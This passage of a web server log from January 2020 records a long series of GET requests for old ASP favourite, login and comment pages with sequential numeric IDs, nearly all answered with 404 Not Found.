6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:53:21] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=316 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:53:53] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=317 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:54:09] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=321 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:54:31] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=322 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:54:41] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=323 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:54:56] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=325 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:55:03] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=326 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:55:27] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=327 HTTP/1.0" 404 6422 [06/Jan/2020 17:55:30] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:55:35] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=328 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:56:05] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=330 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:56:22] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=331 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:56:39] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=332 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:56:44] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=333 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:57:07] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=334 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:57:11] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=344 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:57:15] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=348 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:57:51] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=349 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:57:57] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=356 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:58:06] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=366 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:58:11] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=368 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:58:36] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=371 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:59:43] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=372 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:00:12] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=373 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:00:25] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=374 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:00:32] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=376 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:01:12] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=390 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:01:27] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=393 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:01:59] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=394 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:02:05] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=398 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:02:11] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=408 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:02:21] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=409 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:02:23] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=415 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:02:46] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=416 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:02:59] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=417 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:03:11] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=418 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:04:11] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=419 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:04:34] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=423 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:04:38] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=425 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:04:46] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=426 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:04:53] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=427 HTTP/1.0" 404 6422 [06/Jan/2020 18:05:03] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:05:24] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=430 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:05:28] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=432 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:05:30] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=433 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:05:33] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=434 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:05:44] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=435 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:06:56] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=438 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:07:13] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=445 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:08:05] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=446 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:08:09] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=447 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:08:44] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=449 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:08:50] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=462 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:09:09] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=471 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:09:48] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=472 HTTP/1.0" 404 6422 [06/Jan/2020 18:10:06] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:10:06] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=473 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:10:24] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=474 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:10:38] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=475 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:11:32] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=476 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:11:43] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=477 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:12:43] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=479 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:12:57] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=480 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:13:28] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=481 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:13:53] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=484 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:14:46] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=491 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:14:54] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=494 HTTP/1.0" 404 6422 [06/Jan/2020 18:15:09] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:15:27] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=508 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:15:58] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=509 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:16:05] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=91 HTTP/1.0" 404 6421 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:16:20] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=92 HTTP/1.0" 404 6421 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:16:30] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=93 HTTP/1.0" 404 6421 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:16:50] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=94 HTTP/1.0" 404 6421 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:16:53] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=98 HTTP/1.0" 404 6421 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:17:23] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=99 HTTP/1.0" 404 6421 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:17:31] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1003&InfoID=120 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:17:48] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1003&InfoID=121 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:18:02] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1003&InfoID=133 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:18:11] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1003&InfoID=135 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:18:18] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1003&InfoID=136 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:19:07] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1003&InfoID=238 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:19:37] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1003&InfoID=240 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:20:14] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1003&InfoID=33 HTTP/1.0" 404 6421 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:20:21] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1003&InfoID=34 HTTP/1.0" 404 6421 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:20:24] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1003&InfoID=399 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:21:21] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1003&InfoID=88 HTTP/1.0" 404 6421 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:21:45] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=358 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:22:01] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=361 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:22:04] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=362 HTTP/1.0" 404 6422 [06/Jan/2020 18:23:28] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:24:24] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=363 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:25:07] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=364 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:26:33] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=365 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:27:08] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=478 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:27:59] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=482 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:28:06] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=483 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:28:18] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=485 HTTP/1.0" 404 6422 [06/Jan/2020 18:28:31] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:28:49] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=490 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:28:52] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=492 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:28:58] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=493 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:29:44] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=495 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:29:49] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=496 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:29:55] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=497 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:31:01] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=498 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:31:07] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=500 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:31:24] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=510 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:31:37] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=18 HTTP/1.0" 404 6421 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:32:45] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=248 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:32:52] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=250 HTTP/1.0" 404 6422 [06/Jan/2020 18:33:33] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:34:07] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=324 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:34:20] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=350 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:34:45] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=352 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:36:05] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=353 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:36:16] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=354 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:36:24] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=355 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:36:33] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=367 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:36:49] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=431 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:36:59] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=436 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:38:09] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=437 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:38:51] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=454 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:39:32] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=457 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:39:51] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=458 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:39:59] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=459 HTTP/1.0" 404 6422 [06/Jan/2020 18:40:16] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:41:01] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=460 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:41:56] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=461 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:42:17] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=469 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:42:35] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=486 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:42:41] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=487 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:43:20] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1006&InfoID=343 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:43:43] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1006&InfoID=346 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:44:30] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1006&InfoID=357 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:44:46] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1006&InfoID=369 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:44:55] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1006&InfoID=375 HTTP/1.0" 404 6422 [06/Jan/2020 18:45:18] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:45:24] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1006&InfoID=470 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:45:38] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1007&InfoID=439 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:45:41] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1007&InfoID=440 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:45:46] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1007&InfoID=441 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:46:28] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1007&InfoID=442 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:46:40] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1007&InfoID=443 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:47:24] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1007&InfoID=453 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:47:28] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1007&InfoID=466 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:47:30] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1007&InfoID=499 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:47:41] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1007&InfoID=502 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:48:09] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1008&InfoID=168 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:48:12] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1008&InfoID=169 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:48:36] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1008&InfoID=170 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:49:39] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1008&InfoID=171 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:50:04] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1008&InfoID=172 HTTP/1.0" 404 6422 [06/Jan/2020 18:50:21] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:50:38] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1008&InfoID=173 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:50:50] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1008&InfoID=271 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:50:54] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1008&InfoID=71 HTTP/1.0" 404 6421 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:51:30] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1008&InfoID=72 HTTP/1.0" 404 6421 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:51:37] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1008&InfoID=73 HTTP/1.0" 404 6421 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:52:36] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=263 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:53:00] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=267 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:53:35] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=278 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:53:42] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=391 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:53:56] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=406 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:54:11] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=407 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:54:56] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=421 HTTP/1.0" 404 6422 [06/Jan/2020 18:55:23] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:55:24] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=422 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:55:48] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=424 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:56:22] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=448 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:57:00] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=451 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:57:07] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=455 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:57:31] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=464 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 18:57:41] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=465 HTTP/1.0" 404 6422 Not Found: /User/User_Login.asp [06/Jan/2020 18:57:56] "GET /User/User_Login.asp HTTP/1.0" 404 6368 Not Found: /aqgl/Comment.asp [06/Jan/2020 18:58:17] "GET /aqgl/Comment.asp?ArticleID=120 HTTP/1.0" 404 6373 Not Found: /aqgl/Comment.asp [06/Jan/2020 18:58:20] "GET /aqgl/Comment.asp?ArticleID=121 HTTP/1.0" 404 6373 Not Found: /aqgl/Comment.asp [06/Jan/2020 18:58:26] "GET /aqgl/Comment.asp?ArticleID=133 HTTP/1.0" 404 6373 Not Found: /aqgl/Comment.asp [06/Jan/2020 18:58:33] "GET /aqgl/Comment.asp?ArticleID=135 HTTP/1.0" 404 6373 Not Found: /aqgl/Comment.asp [06/Jan/2020 18:58:38] "GET /aqgl/Comment.asp?ArticleID=136 HTTP/1.0" 404 6373 Not Found: /aqgl/Comment.asp [06/Jan/2020 18:58:56] "GET /aqgl/Comment.asp?ArticleID=238 HTTP/1.0" 404 6373 Not Found: /aqgl/Comment.asp [06/Jan/2020 18:59:13] "GET /aqgl/Comment.asp?ArticleID=240 HTTP/1.0" 404 6373 Not Found: /aqgl/Comment.asp [06/Jan/2020 18:59:31] "GET 